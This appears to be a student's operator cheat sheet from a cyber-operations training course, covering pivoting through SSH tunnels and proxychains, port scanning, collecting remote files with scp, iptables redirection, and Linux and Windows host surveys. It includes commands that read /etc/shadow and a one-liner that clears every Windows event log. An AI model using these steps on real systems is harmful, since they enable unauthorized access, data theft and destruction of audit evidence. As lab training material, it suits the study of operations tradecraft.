Before the Operation
------------------------------------------------------------------------------------------------------------------
Below are the requirements of the Operator before conducting an operation. Failure to do so may result in immediate failure.

Review mission plan
Power on OpStation
Create STUDENT DIRECTORY: /<student#>_<dd-mm-yy>_<op#>
cd into STUDENT DIRECTORY
Create an opnotes file with: vim notes_<dd-mm-yy>
Create a NSDB file with: vim NSDB_<dd-mm-yy>
Script all target and scanning terminal windows with: script -af termscreen.$$
Do NOT script your 'notes' or 'NSDB' terminal windows.
Verify IPs with MC prior to mission start




Enumeration
-------------------------------------------------------------------------------------------------------------
Hostname
OS
local time/Zulu time
all network interfaces
listening ports
non-system processes
services
partitions
resource usage (memory, CPU, and storage space) of particular interest
record all user accounts for use in follow-on operations

Scanning
------------------------------------------------------------------------------------------------------------------
Ping Sweep
for i in {1..254} ;do (ping -c 1 192.168.0.$i | grep "bytes from" &) ;done
nmap
ssh -S /tmp/T1 dummy -O forward -D 9050 <- set up dynamic socket to use proxychains
proxychains nmap -Pn -n (-O for OS info) -vvv -T3 -sT -p T:22,111,22022,80,443,445,3389 <remote_ip>


Collection
-----------------------------------------------------------------------------------------------------------------
scp -P 3333 -r -o ControlPath=/tmp/T3 student15@127.0.0.1:/Windows/Prefetch /student15_06-03-24_HH09/T3_Collect/good_stuff p {source} {Destination}
Upload:
scp [/path/to/local/]<file> <user>@<remote_IP>:~/.
Download
scp <user>@<remote_ip>:[/path/to/remote]<file> [/path/to/local/file]
^ use -r for copying an entire directory
scp -P <PORT#> -r -o ControlPath=</tmp/T2> student15@127.0.0.1:<REMOTE FILEPATH> <LOCAL FILEPATH>
scp -P 31337 -T -r -o ControlPath=/tmp/T4 student15@127.0.0.1:'"C:/Program Files/Common Files/system/ado/*"' /student15_06-03-24_HH09/T4_Collect/

ssh-cat
Download
ssh <user>@<Remote_IP> "cat <file>" > <file>
Upload
ssh <user>@<Remote_IP> "cat > <file>" < <file>

SSH
-------------------------------------------------------------------------------------------------------------

ssh -MS /tmp/T1 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null student15@10.50.35.49
ssh -s  /tmp/T1 -O forward -L127..0.0.1:37954:192.168.0.10:22 dummy 

IpTables
-------------------------------------------------------------------------------------------------------------
lsmod
sudo iptables -L
sudo iptables -t nat -nvL
sudo iptables -t nat -A PREROUTING -p tcp --dport <RHP> -j DNAT --to-destination <IP1>:<SSHPORT>
sudo iptables -t nat -A POSTROUTING -p tcp -d <IP1> <RHP> -j SNAT --to-source <IP2>

iptables -t nat -A POSTROUTING -p tcp  -j MASQUERADE (SLEDGEHAMMER)
iptables -t nat -A POSTROUTING -p tcp --dport 22 -j SNAT --to-source 192.168.99.254 (SCALPEL)

To check the status of a Router:
sysctl net.ipv4.ip_forward
cat /proc/sys/net/ipv4/ip_forward
To enable:
sysctl -w net.ipv4.ip_forward=1
echo 1 > /proc/sys/net/ipv4/ip_forward


##LINVET Linux
------------------------------------------------------------------------------------------------------------
w
uname -a;id
date;date -u
pwd
ls -latr
ls -latr ..
ls -latr /
sudo ls -latr /tmp
sudo ls -latr /root
sudo ls -latr ~/.bash_history
#sudo cat /root/.bash_history
#sudo cat ~/.bash_history
*ls -latr /dev/shm
ls -latr /var/spool/cron
ls -latr /var/*acc*
ls -latr /var/*log*/
sudo ls -latr /var/log/*
#cat /var/log/* | grep [logged in user account]
*ls -latr /var/log/audit/audit.log
#read all the config files
ls -la /etc/*syslog*
cat /etc/shadow
cat /etc/passwd
cut -f1 -d: /etc/passwd
for user in $(cut -f1 -d: /etc/passwd); do echo "###### $user crontab is:"; cat /var/spool/cron/{crontabs/$user,$user} 2>/dev/null; done

cat /etc/crontab
ls -latr /var/spool/cron
#tail -n 1000 [files in /var/spool/cron/]
ls -la /etc/cron.*
#As needed, examine the files/scripts shown in the directory listing of the cron.* directories

mount
#mount | column -t
df -h



ifconfig -a; ip addr
ps -elf
netstat -auntp


sestatus OR getenforce


ls -latr /etc/*release*
cat /etc/*release*
cat /proc/cpuinfo
#(depending on systemd vs not systemd)
services --status-all || systemctl status --no-pager

#/var/log/messages can log a find, usually from automount calls
find / \( -path /proc -prune -o -path /sys -prune \) -o -mmin -30 since initial connection> -type f -print0 | xargs -0 ls -latr (NOTE there is a "-" a.k.a minus symbol preceding the "<duration since initial connection>"
#depending on permissions, running find can be nasty
#find / -mmin -<TIME> 2>&1|egrep -v "^/proc/"|egrep -v "^/sys/"


#LINFO Linux Info Gathering
------------------------------------------------------------------------------------------------------------------
#mount
lsmod
#uname -a
#ls -latr /etc/*release*
#cat /etc/*release*
cat /proc/cpuinfo
#services --status-all || systemctl status --no-pager (depending on systemd vs not systemd)
cat /proc/meminfo
#cat /etc/shadow
#cat /etc/passwd
lspci -vv
arp -a
lsusb
lsblk
fdisk -l
free -m
dmidecode -t bios
#ls -alR / (make sure scrollback limit is set to MAX on terminal)





#LINEXIT Linux Exit Survey
------------------------------------------------------------------------------------------------------------------
ls -latr /tmp
ps -elf
netstat -lptn
ls -latr /var/log
w

#/var/log/messages can log a find, usually from automount calls
find / \( -path /proc -prune -o -path /sys -prune \) -o -mmin -&lt;yourminutesontarget&gt; -
#depending on permissions, running find can be nasty
#find / -mmin -<TIME> 2>&1|egrep -v "^/proc/"|egrep -v "^/sys/"
type f -print0 | xargs -0 ls -latr




sudo less /etc/rsyslog.d/00-my_iptables.conf









#WINVET Windows Survey Commands
------------------------------------------------------------------------------------------------------------------
date /t
time /t
tasklist /V

#For suspicious process'# 
wmic process get processid,parentprocessid,executablepath | findstr norton.exe

#To hash a file on windows#
certutil -hashfile "c:\example\test_file.txt" SHA256


auditpol /get /category:*
ipconfig /all
netstat /anob #Views SSH Connections# 
netsh advfirewall show allprofiles
net share
reg query hklm\software\microsoft\windows\currentversion\run 
reg query hklm\software\microsoft\windows\currentversion\runonce
reg query hklm\software
at
schtasks /query 
dir /o:d /t:w c:\
dir /o:d /t:w c:\windows\temp
dir /o:d /t:w c:\windows\
dir /o:d /t:w c:\windows\system32
dir /o:d /t:w c:\windows\system32\winevt\logs
dir /o:d /t:w &quot;%appdata%\microsoft\windows\start menu\programs\startup&quot;
wevtutil qe security /c:25 /rd:true /f:text (whatever has updated from previous dir)



#WINEXIT Windows Exit Commands
------------------------------------------------------------------------------------------------------------------
dir /o:d /t:w c:\windows\temp
dir /o:d /t:w c:\windows\system32\winevt\logs
wevtutil qe security /c:25 /rd:true /f:text (whatever has updated from previous dir)
netstat /anob
tasklist


Win Privileged User Reportable Items
------------------------------------------------------------------------------------------------------------------
Target - Where did you see this user?
User - What is their username?
Access time - How long have they been on?
Access method - Did they access locally? Remotely?
Provide all relevant details
Privileges - What are they capable of doing?
Activity - What are they currently doing?
Recommendation - Do we need to be concerned? Do we need to adjust our plans?



#WINFO Windows Info Commands
------------------------------------------------------------------------------------------------------------------
query user
systeminfo
net user
net localgroup
net session
net start
type %systemroot%\system32\drivers\etc\hosts
arp -a
route print
driverquery /v
wmic baseboard get Manufacturer, Model, PRoduct, SerialNumber, Version
wmic cpu get deviceID, Addresswidth, MaxClockSpeed, Name, Manufacturer
wmic logicaldisk get name, freespace, systemname, filesystem, size, volumeserialnumber
wmic path Win32_VideoController get caption, CurrentHorizontalResolution, CurrentVerticalResolution, Description, DriverVersion, AdapterRAM /format:list
wmic printer list full
wmic path win32_pnpentity where "ConfigManagerErrorCode<>0" get Name, PNPDeviceID
wmic qfe list full
wmic service list full
wmic product get Caption, InstallDate, Vendor



#WINLOG Clearing and managing Logging
------------------------------------------------------------------------------------------------------------------
#Backup and clear a log simultaniously#
wevtutil clear-log <LOG> /backup:backup.evtx
# clear all logs#
for /f %x in ('wevtutil el') do wevtutil cl "%x"
#View Logs#
wevtutil qe setup /c:25 /rd:true /f:text | findstr norton.exe


#Service Information Using wmic
------------------------------------------------------------------------------------------------------------------
Name and account for all services:
wmic service get name,startname

started services only:
wmic service where started=true get  name, startname

services with specific pattern in name:
wmic service where 'name like "%sql%"' get  name, startname

nicely formatted as html table (and then opened in your browser):
(wmic service where 'name like "%sql%"' get  name, startname /format:htable >out.html) && out.html





After an Operation
-----------------------------------------------------------------------------------------------------------------
Below are the requirements of the Operator after completing or failing to complete an operation.

All files collected, edited, used by student must be located in STUDENT DIRECTORY
DEBRIEF reported to MC in DM
See below for DEBRIEF Template
cd out of the STUDENT DIRECTORY: cd ..
Zip everything up: tar -cvf <studentdir>.tar <studentdir>
Push tar to server: scp <studentdir>.tar student#@10.50.45.221:~
Password: password#


Debrief
------------------------------------------------------------------------------------------------------------------
Operator: <your name>
Operation: <name of operation>
MC: <name of MC>
Analyst: <name of analyst>
Description: <two-three sentence description of operation as well as one sentence summary per target.>

EX)
Operation: DryRun1
Operator: SSG Brandee Lymon
MC: MC2
Analyst: Analyst2
Description: Goal of operation was to collect email from EMAIL3. Mission was overall successful. Operator redirected through EXT_RTR to ADMIN1 to EMAIL3. Admin was logged into T2 running a security product. ClamAV was found on EMAIL3, MC provided guidance and email was collected.
















































































